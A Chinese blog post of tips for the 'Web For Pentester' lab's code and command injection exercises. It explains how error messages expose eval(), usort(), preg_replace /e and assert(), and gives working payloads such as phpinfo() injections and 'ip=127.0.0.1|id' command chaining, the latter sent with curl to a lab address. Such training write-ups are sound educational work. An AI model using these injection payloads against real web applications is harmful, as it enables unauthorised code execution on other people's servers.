专栏首页Urahara BlogWeb For Pentester - Code injection & Commands injection Part Tips

Web For Pentester - Code injection & Commands injection Part Tips

Code injection Part

Example 1

这里使用双引号页面会抛出异常,异常信息中显示程序使用了eval()函数,也就是说这里可能存在代码执行漏洞

name=”.phpinfo();//

Example 2

这里可以看出程序对相关数据进行了排序,那么存在两种情况,有可能是使用order by数据库语句进行排序,也有可能是通过php的usort()函数进行排序,通过特殊字符报错报错显示程序使用了usort()函数,usort()很多情况下会搭配create_function()动态生成一个函数,如果web应用程序缺乏有效的过滤和验证,这可能会导致代码执行。

order=name);}phpinfo();//

Example 3

同样我们让程序进行报错,从报错信息中得知程序使用了preg_replace()函数,看见这个一定想到了被他所指定的preg_replace_eval()函数(在php5.5以后被弃用),那么这里通过/e修饰符来进行指定

new=phpinfo()&pattern=/lamer/e&base=Hello lamer

Example 4

通过报错信息可以看出这里使用了assert()函数,那么可以猜测进行语句拼接“‘.’”

me=hacker’.phpinfo().’

Commands injection Part

Example 1

最普通的命令执行漏洞,未做任何过滤,直接拼接系统命令就可以

ip=127.0.0.1|id

ip=127.0.0.1%26%26id

Example 2

ip=127.0.0.1%0Aid

Example 3

通过网络请求可以看着这里会有个302跳转,那么就直接使用nc、telnet、curl等进行单次请求

curl http://192.168.149.134/commandexec/example3.php?ip=127.0.0.1|id


本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • Redis Hacking Tips

    风流
  • CVE-2017-12635 Apache CouchDB 特权提升漏洞分析

    风流
  • Redis Hacking Tips

    ​ You must know the physical path of the Web site

    风流
  • 深度工作准则4——摒弃浮浅

    yeedomliu
  • 中国软件评测中心刘冬:物联网安全应引起足够重视

    12月19日,2017中国通信产业大会(CCIC2017)暨第12届中国通信技术年会在北京召开。今年大会以“大连接、泛智能下的创新与挑战”为主题,聚焦大连接与泛...

    企鹅号小编
  • PyCharm证书过期:Your license has expired

    报错“your evaluation license has expired, pycharm will now exit” 1、解决步骤,点击‘Activat...

    北京-宏哥
  • 2018:春来秋去,往事知何处(上)

    去年 12 月的某个夜晚,在部署服务的无聊时光里,我突然想翻看自己一年来的朋友圈,看看有哪些有趣的事情。结果那夜一发不可收拾,扫了半年的朋友圈,一直读到凌晨三点...

    tyrchen
  • 56岁潘石屹下定决心学Python,60多岁程序语言之父们还在敲代码,你还敢懈怠吗?

    上周,SOHO中国董事长、地产大亨潘石屹,56岁生日当天发布微博宣布进军编程语言Python。

    量子位
  • windows 的cmd?长的丑还不好使:(

    两种版本:mini(只有基本的使用方法),full(内部集成了git),可自行选择下载

    用户5521279
  • 【Docker】Docker学习记录: Shipyard+Swarm+Consul+Service Discover 搭建教程

    Rainbond开源

扫码关注云+社区

领取腾讯云代金券